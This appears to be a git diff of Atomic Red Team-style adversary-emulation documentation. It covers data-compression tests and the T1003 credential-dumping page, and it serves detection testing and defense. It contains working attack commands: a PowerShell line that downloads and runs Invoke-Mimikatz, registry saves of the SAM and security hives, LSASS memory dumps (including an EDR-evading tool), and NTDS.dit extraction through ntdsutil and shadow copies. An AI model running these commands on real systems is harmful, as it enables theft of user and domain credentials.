Dependencies: Run with `command_prompt`! + ##### Description: Rar tool must be installed at specified location (#{rar_exe}) + ##### Check Prereq Commands: + ```cmd if not exist "#{rar_exe}" (exit /b 1) ``` + ##### Get Prereq Commands: + ```cmd echo Downloading Winrar installer bitsadmin /transfer myDownloadJob /download /priority normal "https://www.win-rar.com/fileadmin/winrar-versions/winrar/th/winrar-x64-580.exe" #{rar_installer} @@ -99,133 +97,123 @@ echo Follow the installer prompts to install Winrar #{rar_installer} ``` - - -

## Atomic Test #3 - Data Compressed - nix - zip -An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration. This test uses standard zip compression. - -**Supported Platforms:** Linux, macOS - +An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration. This test uses +standard zip compression. +**Supported Platforms:** Linux, macOS #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | input_files | Path that should be compressed into our output file, may include wildcards | Path | $HOME/*.txt| | output_file | Path that should be output as a zip archive | Path | $HOME/data.zip| - -#### Attack Commands: Run with `sh`! - +#### Attack Commands: Run with `sh`! ```sh zip #{output_file} #{input_files} ``` #### Cleanup Commands: + ```sh rm -f #{output_file} ``` - - #### Dependencies: Run with `sh`! + ##### Description: Files to zip must exist (#{input_files}) + ##### Check Prereq Commands: + ```sh ls #{input_files} ``` + ##### Get Prereq Commands: + ```sh echo Please set input_files argument to include files that exist ``` - - -

## Atomic Test #4 - Data Compressed - nix - gzip Single File -An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration. This test uses standard gzip compression. - -**Supported Platforms:** Linux, macOS - +An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration. This test uses +standard gzip compression. +**Supported Platforms:** Linux, macOS #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | input_file | Path that should be compressed | Path | $HOME/victim-gzip.txt| | input_content | contents of compressed files if file does not already exist. default contains test credit card and social security number | String | confidential! SSN: 078-05-1120 - CCN: 4000 1234 5678 9101| - -#### Attack Commands: Run with `sh`! - +#### Attack Commands: Run with `sh`! ```sh test -e #{input_file} && gzip -k #{input_file} || (echo '#{input_content}' >> #{input_file}; gzip -k #{input_file}) ``` #### Cleanup Commands: + ```sh rm -f #{input_file}.gz ``` - - - -

## Atomic Test #5 - Data Compressed - nix - tar Folder or File -An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration. This test uses standard gzip compression. - -**Supported Platforms:** Linux, macOS - +An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration. This test uses +standard gzip compression. +**Supported Platforms:** Linux, macOS #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | input_file_folder | Path that should be compressed | Path | $HOME/$USERNAME| | output_file | File that should be output | Path | $HOME/data.tar.gz| - -#### Attack Commands: Run with `sh`! - +#### Attack Commands: Run with `sh`! ```sh tar -cvzf #{output_file} #{input_file_folder} ``` #### Cleanup Commands: + ```sh rm -f #{output_file} ``` - - #### Dependencies: Run with `sh`! + ##### Description: Folder to zip must exist (#{input_file_folder}) + ##### Check Prereq Commands: + ```sh test -e #{input_file_folder} ``` + ##### Get Prereq Commands: + ```sh echo Please set input_file_folder argument to a folder that exists ``` - - -
diff --git a/Atomic_Threat_Coverage/Triggers/T1003.md b/Atomic_Threat_Coverage/Triggers/T1003.md index 5d395150..cf609347 100644 --- a/Atomic_Threat_Coverage/Triggers/T1003.md +++ b/Atomic_Threat_Coverage/Triggers/T1003.md @@ -1,18 +1,21 @@ # T1003 - Credential Dumping + ## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1003) +
Credential dumping is the process of obtaining account login and password information, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information. -Several of the tools mentioned in this technique may be used by both adversaries and professional security testers. Additional custom tools likely exist as well. +Several of the tools mentioned in this technique may be used by both adversaries and professional security testers. +Additional custom tools likely exist as well. ### Windows #### SAM (Security Accounts Manager) -The SAM is a database file that contains local accounts for the host, typically those found with the ‘net user’ command. To enumerate the SAM database, system level access is required. -  +The SAM is a database file that contains local accounts for the host, typically those found with the ‘net user’ command. +To enumerate the SAM database, system level access is required. A number of tools can be used to retrieve the SAM file through in-memory techniques: -* pwdumpx.exe +* pwdumpx.exe * [gsecdump](https://attack.mitre.org/software/S0008) * [Mimikatz](https://attack.mitre.org/software/S0002) * secretsdump.py @@ -31,11 +34,12 @@ User accounts start with a RID of 1,000+. #### Cached Credentials -The DCC2 (Domain Cached Credentials version 2) hash, used by Windows Vista and newer caches credentials when the domain controller is unavailable. The number of default cached credentials varies, and this number can be altered per system. This hash does not allow pass-the-hash style attacks. -  +The DCC2 (Domain Cached Credentials version 2) hash, used by Windows Vista and newer caches credentials when the domain +controller is unavailable. The number of default cached credentials varies, and this number can be altered per system. +This hash does not allow pass-the-hash style attacks. A number of tools can be used to retrieve the SAM file through in-memory techniques. -* pwdumpx.exe +* pwdumpx.exe * [gsecdump](https://attack.mitre.org/software/S0008) * [Mimikatz](https://attack.mitre.org/software/S0002) @@ -46,13 +50,13 @@ Cached credentials for Windows Vista are derived using PBKDF2. #### Local Security Authority (LSA) Secrets -With SYSTEM access to a host, the LSA secrets often allows trivial access from a local account to domain-based account credentials. The Registry is used to store the LSA secrets. -  -When services are run under the context of local or domain users, their passwords are stored in the Registry. If auto-logon is enabled, this information will be stored in the Registry as well. -  +With SYSTEM access to a host, the LSA secrets often allows trivial access from a local account to domain-based account +credentials. The Registry is used to store the LSA secrets. +When services are run under the context of local or domain users, their passwords are stored in the Registry. If +auto-logon is enabled, this information will be stored in the Registry as well. A number of tools can be used to retrieve the SAM file through in-memory techniques. -* pwdumpx.exe +* pwdumpx.exe * [gsecdump](https://attack.mitre.org/software/S0008) * [Mimikatz](https://attack.mitre.org/software/S0002) * secretsdump.py @@ -60,14 +64,17 @@ A number of tools can be used to retrieve the SAM file through in-memory techniq Alternatively, reg.exe can be used to extract from the Registry and Creddump7 used to gather the credentials. Notes: -The passwords extracted by his mechanism are UTF-16 encoded, which means that they are returned in plaintext. +The passwords extracted by his mechanism are UTF-16 encoded, which means that they are returned in plaintext. Windows 10 adds protections for LSA Secrets described in Mitigation. #### NTDS from Domain Controller -Active Directory stores information about members of the domain including devices and users to verify credentials and define access rights. The Active Directory domain database is stored in the NTDS.dit file. By default the NTDS file will be located in %SystemRoot%\NTDS\Ntds.dit of a domain controller. (Citation: Wikipedia Active Directory) - -The following tools and techniques can be used to enumerate the NTDS file and the contents of the entire Active Directory hashes. +Active Directory stores information about members of the domain including devices and users to verify credentials and +define access rights. The Active Directory domain database is stored in the NTDS.dit file. By default the NTDS file will +be located in %SystemRoot%\NTDS\Ntds.dit of a domain controller. (Citation: Wikipedia Active Directory) + +The following tools and techniques can be used to enumerate the NTDS file and the contents of the entire Active +Directory hashes. * Volume Shadow Copy * secretsdump.py @@ -76,11 +83,15 @@ The following tools and techniques can be used to enumerate the NTDS file and th #### Group Policy Preference (GPP) Files -Group Policy Preferences (GPP) are tools that allowed administrators to create domain policies with embedded credentials. These policies, amongst other things, allow administrators to set local accounts. +Group Policy Preferences (GPP) are tools that allowed administrators to create domain policies with embedded +credentials. These policies, amongst other things, allow administrators to set local accounts. -These group policies are stored in SYSVOL on a domain controller, this means that any domain user can view the SYSVOL share and decrypt the password (the AES private key was leaked on-line. (Citation: Microsoft GPP Key) (Citation: SRD GPP) +These group policies are stored in SYSVOL on a domain controller, this means that any domain user can view the SYSVOL +share and decrypt the password (the AES private key was leaked on-line. (Citation: Microsoft GPP Key) (Citation: SRD +GPP) -The following tools and scripts can be used to gather and decrypt the password file from Group Policy Preference XML files: +The following tools and scripts can be used to gather and decrypt the password file from Group Policy Preference XML +files: * Metasploit’s post exploitation module: "post/windows/gather/credentials/gpp" * Get-GPPPassword (Citation: Obscuresecurity Get-GPPPassword) @@ -96,23 +107,28 @@ See [Kerberoasting](https://attack.mitre.org/techniques/T1208). #### Plaintext Credentials -After a user logs on to a system, a variety of credentials are generated and stored in the Local Security Authority Subsystem Service (LSASS) process in memory. These credentials can be harvested by a administrative user or SYSTEM. +After a user logs on to a system, a variety of credentials are generated and stored in the Local Security Authority +Subsystem Service (LSASS) process in memory. These credentials can be harvested by a administrative user or SYSTEM. -SSPI (Security Support Provider Interface) functions as a common interface to several Security Support Providers (SSPs): A Security Support Provider is a dynamic-link library (DLL) that makes one or more security packages available to applications. +SSPI (Security Support Provider Interface) functions as a common interface to several Security Support Providers (SSPs): +A Security Support Provider is a dynamic-link library (DLL) that makes one or more security packages available to +applications. The following SSPs can be used to access credentials: Msv: Interactive logons, batch logons, and service logons are done through the MSV authentication package. -Wdigest: The Digest Authentication protocol is designed for use with Hypertext Transfer Protocol (HTTP) and Simple Authentication Security Layer (SASL) exchanges. (Citation: TechNet Blogs Credential Protection) +Wdigest: The Digest Authentication protocol is designed for use with Hypertext Transfer Protocol (HTTP) and Simple +Authentication Security Layer (SASL) exchanges. (Citation: TechNet Blogs Credential Protection) Kerberos: Preferred for mutual client-server domain authentication in Windows 2000 and later. -CredSSP:  Provides SSO and Network Level Authentication for Remote Desktop Services. (Citation: Microsoft CredSSP) -  +CredSSP: Provides SSO and Network Level Authentication for Remote Desktop Services. (Citation: Microsoft CredSSP) + The following tools can be used to enumerate credentials: * [Windows Credential Editor](https://attack.mitre.org/software/S0005) * [Mimikatz](https://attack.mitre.org/software/S0002) -As well as in-memory techniques, the LSASS process memory can be dumped from the target host and analyzed on a local system. +As well as in-memory techniques, the LSASS process memory can be dumped from the target host and analyzed on a local +system. For example, on the target host use procdump: @@ -120,18 +136,37 @@ For example, on the target host use procdump: Locally, mimikatz can be run: -* sekurlsa::Minidump lsassdump.dmp +* sekurlsa::Minidump lsassdump.dmp * sekurlsa::logonPasswords #### DCSync -DCSync is a variation on credential dumping which can be used to acquire sensitive information from a domain controller. Rather than executing recognizable malicious code, the action works by abusing the domain controller's application programming interface (API) (Citation: Microsoft DRSR Dec 2017) (Citation: Microsoft GetNCCChanges) (Citation: Samba DRSUAPI) (Citation: Wine API samlib.dll) to simulate the replication process from a remote domain controller. Any members of the Administrators, Domain Admins, Enterprise Admin groups or computer accounts on the domain controller are able to run DCSync to pull password data (Citation: ADSecurity Mimikatz DCSync) from Active Directory, which may include current and historical hashes of potentially useful accounts such as KRBTGT and Administrators. The hashes can then in turn be used to create a Golden Ticket for use in [Pass the Ticket](https://attack.mitre.org/techniques/T1097) (Citation: Harmj0y Mimikatz and DCSync) or change an account's password as noted in [Account Manipulation](https://attack.mitre.org/techniques/T1098). (Citation: InsiderThreat ChangeNTLM July 2017) DCSync functionality has been included in the "lsadump" module in Mimikatz. (Citation: GitHub Mimikatz lsadump Module) Lsadump also includes NetSync, which performs DCSync over a legacy replication protocol. (Citation: Microsoft NRPC Dec 2017) +DCSync is a variation on credential dumping which can be used to acquire sensitive information from a domain controller. +Rather than executing recognizable malicious code, the action works by abusing the domain controller's application +programming interface (API) (Citation: Microsoft DRSR Dec 2017) (Citation: Microsoft GetNCCChanges) (Citation: Samba +DRSUAPI) (Citation: Wine API samlib.dll) to simulate the replication process from a remote domain controller. Any +members of the Administrators, Domain Admins, Enterprise Admin groups or computer accounts on the domain controller are +able to run DCSync to pull password data (Citation: ADSecurity Mimikatz DCSync) from Active Directory, which may include +current and historical hashes of potentially useful accounts such as KRBTGT and Administrators. The hashes can then in +turn be used to create a Golden Ticket for use in [Pass the Ticket](https://attack.mitre.org/techniques/T1097) ( +Citation: Harmj0y Mimikatz and DCSync) or change an account's password as noted +in [Account Manipulation](https://attack.mitre.org/techniques/T1098). (Citation: InsiderThreat ChangeNTLM July 2017) +DCSync functionality has been included in the "lsadump" module in Mimikatz. (Citation: GitHub Mimikatz lsadump Module) +Lsadump also includes NetSync, which performs DCSync over a legacy replication protocol. (Citation: Microsoft NRPC Dec +2017) ### Linux #### Proc filesystem -The /proc filesystem on Linux contains a great deal of information regarding the state of the running operating system. Processes running with root privileges can use this facility to scrape live memory of other running programs. If any of these programs store passwords in clear text or password hashes in memory, these values can then be harvested for either usage or brute force attacks, respectively. This functionality has been implemented in the [MimiPenguin](https://attack.mitre.org/software/S0179), an open source tool inspired by [Mimikatz](https://attack.mitre.org/software/S0002). The tool dumps process memory, then harvests passwords and hashes by looking for text strings and regex patterns for how given applications such as Gnome Keyring, sshd, and Apache use memory to store such authentication artifacts.
+The /proc filesystem on Linux contains a great deal of information regarding the state of the running operating system. +Processes running with root privileges can use this facility to scrape live memory of other running programs. If any of +these programs store passwords in clear text or password hashes in memory, these values can then be harvested for either +usage or brute force attacks, respectively. This functionality has been implemented in +the [MimiPenguin](https://attack.mitre.org/software/S0179), an open source tool inspired +by [Mimikatz](https://attack.mitre.org/software/S0002). The tool dumps process memory, then harvests passwords and +hashes by looking for text strings and regex patterns for how given applications such as Gnome Keyring, sshd, and Apache +use memory to store such authentication artifacts. ## Atomic Tests @@ -167,83 +202,75 @@ The /proc filesystem on Linux contains a great deal of information regarding the - [Atomic Test #16 - Registry parse with pypykatz](#atomic-test-16---registry-parse-with-pypykatz) -
## Atomic Test #1 - Powershell Mimikatz + Dumps credentials from memory via Powershell by invoking a remote mimikatz script. If Mimikatz runs successfully you will see several usernames and hashes output to the screen. -Common failures include seeing an "access denied" error which results when Anti-Virus blocks execution. -Or, if you try to run the test without the required administrative privleges you will see this error near the bottom of the output to the screen "ERROR kuhl_m_sekurlsa_acquireLSA" +Common failures include seeing an "access denied" error which results when Anti-Virus blocks execution. +Or, if you try to run the test without the required administrative privleges you will see this error near the bottom of +the output to the screen "ERROR kuhl_m_sekurlsa_acquireLSA" **Supported Platforms:** Windows - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | remote_script | URL to a remote Mimikatz script that dumps credentials | Url | https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltration/Invoke-Mimikatz.ps1| - -#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin) - +#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin) ```powershell IEX (New-Object Net.WebClient).DownloadString('#{remote_script}'); Invoke-Mimikatz -DumpCreds ``` - - - - -

## Atomic Test #2 - Gsecdump + Dump credentials from memory using Gsecdump. Upon successful execution, you should see domain\username's following by two 32 characters hashes. -If you see output that says "compat: error: failed to create child process", execution was likely blocked by Anti-Virus. +If you see output that says "compat: error: failed to create child process", execution was likely blocked by Anti-Virus. You will receive only error output if you do not run this test from an elevated context (run as administrator) -If you see a message saying "The system cannot find the path specified", try using the get-prereq_commands to download and install Gsecdump first. +If you see a message saying "The system cannot find the path specified", try using the get-prereq_commands to download +and install Gsecdump first. **Supported Platforms:** Windows - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | gsecdump_exe | Path to the Gsecdump executable | Path | PathToAtomicsFolder\T1003\bin\gsecdump.exe| | gsecdump_url | Path to download Gsecdump binary file | url | https://web.archive.org/web/20150606043951if_/http://www.truesec.se/Upload/Sakerhet/Tools/gsecdump-v2b5.exe| | gsecdump_bin_hash | File hash of the Gsecdump binary file | String | 94CAE63DCBABB71C5DD43F55FD09CAEFFDCD7628A02A112FB3CBA36698EF72BC| - -#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) - +#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) ```cmd #{gsecdump_exe} -a ``` - - - #### Dependencies: Run with `powershell`! + ##### Description: Gsecdump must exist on disk at specified location (#{gsecdump_exe}) + ##### Check Prereq Commands: + ```powershell if (Test-Path #{gsecdump_exe}) {exit 0} else {exit 1} ``` + ##### Get Prereq Commands: + ```powershell $parentpath = Split-Path "#{gsecdump_exe}"; $binpath = "$parentpath\gsecdump-v2b5.exe" IEX(IWR "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-WebRequestVerifyHash.ps1") @@ -252,27 +279,24 @@ if(Invoke-WebRequestVerifyHash "#{gsecdump_url}" "$binpath" #{gsecdump_bin_hash} } ``` - - -

## Atomic Test #3 - Windows Credential Editor + Dump user credentials using Windows Credential Editor (supports Windows XP, 2003, Vista, 7, 2008 and Windows 8 only) Upon successful execution, you should see a file with user passwords/hashes at %temp%/wce-output.file. -If you see no output it is likely that execution was blocked by Anti-Virus. +If you see no output it is likely that execution was blocked by Anti-Virus. -If you see a message saying "wce.exe is not recognized as an internal or external command", try using the get-prereq_commands to download and install Windows Credential Editor first. +If you see a message saying "wce.exe is not recognized as an internal or external command", try using the +get-prereq_commands to download and install Windows Credential Editor first. **Supported Platforms:** Windows - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | output_file | Path where resulting data should be placed | Path | %temp%\wce-output.txt| @@ -280,28 +304,30 @@ If you see a message saying "wce.exe is not recognized as an internal or externa | wce_url | Path to download Windows Credential Editor zip file | url | https://www.ampliasecurity.com/research/wce_v1_41beta_universal.zip| | wce_zip_hash | File hash of the Windows Credential Editor zip file | String | 8F4EFA0DDE5320694DD1AA15542FE44FDE4899ED7B3A272063902E773B6C4933| - -#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) - +#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) ```cmd #{wce_exe} -o #{output_file} ``` #### Cleanup Commands: + ```cmd del "#{output_file}" >nul 2>&1 ``` - - #### Dependencies: Run with `powershell`! + ##### Description: Windows Credential Editor must exist on disk at specified location (#{wce_exe}) + ##### Check Prereq Commands: + ```powershell if (Test-Path #{wce_exe}) {exit 0} else {exit 1} ``` + ##### Get Prereq Commands: + ```powershell $parentpath = Split-Path "#{wce_exe}"; $zippath = "$parentpath\wce.zip" IEX(IWR "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-WebRequestVerifyHash.ps1") @@ -312,26 +338,20 @@ if(Invoke-WebRequestVerifyHash "#{wce_url}" "$zippath" #{wce_zip_hash}){ } ``` - - -

## Atomic Test #4 - Registry dump of SAM, creds, and secrets + Local SAM (SAM & System), cached credentials (System & Security) and LSA secrets (System & Security) can be enumerated via three registry keys. Then processed locally using https://github.com/Neohapsis/creddump7 -Upon successful execution of this test, you will find three files named, sam, system and security in the %temp% directory. +Upon successful execution of this test, you will find three files named, sam, system and security in the %temp% +directory. **Supported Platforms:** Windows - - - - -#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) - +#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) ```cmd reg save HKLM\sam %temp%\sam @@ -340,60 +360,59 @@ reg save HKLM\security %temp%\security ``` #### Cleanup Commands: + ```cmd del %temp%\sam >nul 2> nul del %temp%\system >nul 2> nul del %temp%\security >nul 2> nul ``` - - - -

## Atomic Test #5 - Dump LSASS.exe Memory using ProcDump + The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with Sysinternals ProcDump. Upon successful execution, you should see the following file created c:\windows\temp\lsass_dump.dmp. -If you see a message saying "procdump.exe is not recognized as an internal or external command", try using the get-prereq_commands to download and install the ProcDump tool first. +If you see a message saying "procdump.exe is not recognized as an internal or external command", try using the +get-prereq_commands to download and install the ProcDump tool first. **Supported Platforms:** Windows - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | output_file | Path where resulting dump should be placed | Path | C:\Windows\Temp\lsass_dump.dmp| | procdump_exe | Path of Procdump executable | Path | PathToAtomicsFolder\T1003\bin\procdump.exe| - -#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) - +#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) ```cmd #{procdump_exe} -accepteula -ma lsass.exe #{output_file} ``` #### Cleanup Commands: + ```cmd del "#{output_file}" >nul 2> nul ``` - - #### Dependencies: Run with `powershell`! + ##### Description: ProcDump tool from Sysinternals must exist on disk at specified location (#{procdump_exe}) + ##### Check Prereq Commands: + ```powershell if (Test-Path #{procdump_exe}) {exit 0} else {exit 1} ``` + ##### Get Prereq Commands: + ```powershell Invoke-WebRequest "https://download.sysinternals.com/files/Procdump.zip" -OutFile "$env:TEMP\Procdump.zip" Expand-Archive $env:TEMP\Procdump.zip $env:TEMP\Procdump -Force @@ -401,182 +420,172 @@ New-Item -ItemType Directory (Split-Path #{procdump_exe}) -Force | Out-Null Copy-Item $env:TEMP\Procdump\Procdump.exe #{procdump_exe} -Force ``` - - -

## Atomic Test #6 - Dump LSASS.exe Memory using comsvcs.dll + The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with a built-in dll. Upon successful execution, you should see the following file created $env:TEMP\lsass-comsvcs.dmp. **Supported Platforms:** Windows - - - - -#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin) - +#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin) ```powershell C:\Windows\System32\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).id $env:TEMP\lsass-comsvcs.dmp full ``` #### Cleanup Commands: + ```powershell Remove-Item $env:TEMP\lsass-comsvcs.dmp -ErrorAction Ignore ``` - - - -

## Atomic Test #7 - Dump LSASS.exe Memory using direct system calls and API unhooking -The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved using direct system calls and API unhooking in an effort to avoid detection. + +The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved using direct system +calls and API unhooking in an effort to avoid detection. https://github.com/outflanknl/Dumpert https://outflank.nl/blog/2019/06/19/red-team-tactics-combining-direct-system-calls-and-srdi-to-bypass-av-edr/ Upon successful execution, you should see the following file created C:\windows\temp\dumpert.dmp. -If you see a message saying "The system cannot find the path specified.", try using the get-prereq_commands to download the tool first. +If you see a message saying "The system cannot find the path specified.", try using the get-prereq_commands to download +the tool first. **Supported Platforms:** Windows - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | dumpert_exe | Path of Dumpert executable | Path | PathToAtomicsFolder\T1003\bin\Outflank-Dumpert.exe| - -#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) - +#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) ```cmd #{dumpert_exe} ``` #### Cleanup Commands: + ```cmd del C:\windows\temp\dumpert.dmp >nul 2> nul ``` - - #### Dependencies: Run with `powershell`! + ##### Description: Dumpert executable must exist on disk at specified location (#{dumpert_exe}) + ##### Check Prereq Commands: + ```powershell if (Test-Path #{dumpert_exe}) {exit 0} else {exit 1} ``` + ##### Get Prereq Commands: + ```powershell New-Item -ItemType Directory (Split-Path #{dumpert_exe}) -Force | Out-Null Invoke-WebRequest "https://github.com/clr2of8/Dumpert/raw/5838c357224cc9bc69618c80c2b5b2d17a394b10/Dumpert/x64/Release/Outflank-Dumpert.exe" -OutFile #{dumpert_exe} ``` - - -

## Atomic Test #8 - Dump LSASS.exe Memory using Windows Task Manager + The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with the Windows Task Manager and administrative permissions. **Supported Platforms:** Windows +#### Run it with these steps! - - -#### Run it with these steps! 1. Open Task Manager: - On a Windows system this can be accomplished by pressing CTRL-ALT-DEL and selecting Task Manager or by right-clicking - on the task bar and selecting "Task Manager". + On a Windows system this can be accomplished by pressing CTRL-ALT-DEL and selecting Task Manager or by right-clicking + on the task bar and selecting "Task Manager". 2. Select lsass.exe: - If lsass.exe is not visible, select "Show processes from all users". This will allow you to observe execution of lsass.exe - and select it for manipulation. + If lsass.exe is not visible, select "Show processes from all users". This will allow you to observe execution of + lsass.exe + and select it for manipulation. 3. Dump lsass.exe memory: - Right-click on lsass.exe in Task Manager. Select "Create Dump File". The following dialog will show you the path to the saved file. - - - - - - + Right-click on lsass.exe in Task Manager. Select "Create Dump File". The following dialog will show you the path to + the saved file.

## Atomic Test #9 - Offline Credential Theft With Mimikatz -The memory of lsass.exe is often dumped for offline credential theft attacks. Adversaries commonly perform this offline analysis with -Mimikatz. This tool is available at https://github.com/gentilkiwi/mimikatz and can be obtained using the get-prereq_commands. - -**Supported Platforms:** Windows - +The memory of lsass.exe is often dumped for offline credential theft attacks. Adversaries commonly perform this offline +analysis with +Mimikatz. This tool is available at https://github.com/gentilkiwi/mimikatz and can be obtained using the +get-prereq_commands. +**Supported Platforms:** Windows #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | mimikatz_exe | Path of the Mimikatz binary | string | PathToAtomicsFolder\T1003\bin\mimikatz.exe| | input_file | Path of the Lsass dump | Path | %tmp%\lsass.DMP| - -#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) - +#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) ```cmd #{mimikatz_exe} "sekurlsa::minidump #{input_file}" "sekurlsa::logonpasswords full" exit ``` - - - #### Dependencies: Run with `powershell`! + ##### Description: Mimikatz must exist on disk at specified location (#{mimikatz_exe}) + ##### Check Prereq Commands: + ```powershell if (Test-Path #{mimikatz_exe}) {exit 0} else {exit 1} ``` + ##### Get Prereq Commands: + ```powershell Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20200308/mimikatz_trunk.zip" -OutFile "$env:TEMP\Mimi.zip" Expand-Archive $env:TEMP\Mimi.zip $env:TEMP\Mimi -Force New-Item -ItemType Directory (Split-Path #{mimikatz_exe}) -Force | Out-Null Copy-Item $env:TEMP\Mimi\x64\mimikatz.exe #{mimikatz_exe} -Force ``` + ##### Description: Lsass dump must exist at specified location (#{input_file}) + ##### Check Prereq Commands: + ```powershell cmd /c "if not exist #{input_file} (exit /b 1)" ``` + ##### Get Prereq Commands: + ```powershell Write-Host "Create the lsass dump manually using the steps in the previous test (Dump LSASS.exe Memory using Windows Task Manager)" ``` - - -

## Atomic Test #10 - Dump Active Directory Database with NTDSUtil + This test is intended to be run on a domain Controller. -The Active Directory database NTDS.dit may be dumped using NTDSUtil for offline credential theft attacks. This capability +The Active Directory database NTDS.dit may be dumped using NTDSUtil for offline credential theft attacks. This +capability uses the "IFM" or "Install From Media" backup functionality that allows Active Directory restoration or installation of subsequent domain controllers without the need of network-based replication. @@ -584,108 +593,96 @@ Upon successful completion, you will find a copy of the ntds.dit file in the C:\ **Supported Platforms:** Windows - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | output_folder | Path where resulting dump should be placed | Path | C:\Windows\Temp| - -#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) - +#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) ```cmd ntdsutil "ac i ntds" "ifm" "create full #{output_folder}" q q ``` - - - #### Dependencies: Run with `command_prompt`! + ##### Description: Target must be a Domain Controller + ##### Check Prereq Commands: + ```cmd reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ProductOptions /v ProductType | findstr LanmanNT ``` + ##### Get Prereq Commands: + ```cmd echo Sorry, Promoting this machine to a Domain Controller must be done manually ``` - - -

## Atomic Test #11 - Create Volume Shadow Copy with NTDS.dit + This test is intended to be run on a domain Controller. The Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy. **Supported Platforms:** Windows - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | drive_letter | Drive letter to source VSC (including colon) | String | C:| - -#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) - +#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) ```cmd vssadmin.exe create shadow /for=#{drive_letter} ``` - - - #### Dependencies: Run with `command_prompt`! + ##### Description: Target must be a Domain Controller + ##### Check Prereq Commands: + ```cmd reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ProductOptions /v ProductType | findstr LanmanNT ``` + ##### Get Prereq Commands: + ```cmd echo Sorry, Promoting this machine to a Domain Controller must be done manually ``` - - -

## Atomic Test #12 - Copy NTDS.dit from Volume Shadow Copy + This test is intended to be run on a domain Controller. The Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy. This test requires steps taken in the test "Create Volume Shadow Copy with NTDS.dit". -A successful test also requires the export of the SYSTEM Registry hive. +A successful test also requires the export of the SYSTEM Registry hive. This test must be executed on a Windows Domain Controller. **Supported Platforms:** Windows - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | vsc_name | Name of Volume Shadow Copy | String | \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1| | extract_path | Path for extracted NTDS.dit | Path | C:\Windows\Temp| - -#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) - +#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) ```cmd copy #{vsc_name}\Windows\NTDS\NTDS.dit #{extract_path}\ntds.dit @@ -694,250 +691,268 @@ reg save HKLM\SYSTEM #{extract_path}\SYSTEM_HIVE ``` #### Cleanup Commands: + ```cmd del "#{extract_path}\ntds.dit" >nul 2> nul del "#{extract_path}\VSC_SYSTEM_HIVE" >nul 2> nul del "#{extract_path}\SYSTEM_HIVE" >nul 2> nul ``` - - #### Dependencies: Run with `command_prompt`! + ##### Description: Target must be a Domain Controller + ##### Check Prereq Commands: + ```cmd reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ProductOptions /v ProductType | findstr LanmanNT ``` + ##### Get Prereq Commands: + ```cmd echo Sorry, Promoting this machine to a Domain Controller must be done manually ``` + ##### Description: Volume shadow copy must exist + ##### Check Prereq Commands: + ```cmd if not exist #{vsc_name} (exit /b 1) ``` + ##### Get Prereq Commands: + ```cmd echo Run "Invoke-AtomicTest T1003 -TestName 'Create Volume Shadow Copy with NTDS.dit'" to fulfuill this requirement ``` + ##### Description: Extract path must exist + ##### Check Prereq Commands: + ```cmd if not exist #{extract_path} (exit /b 1) ``` + 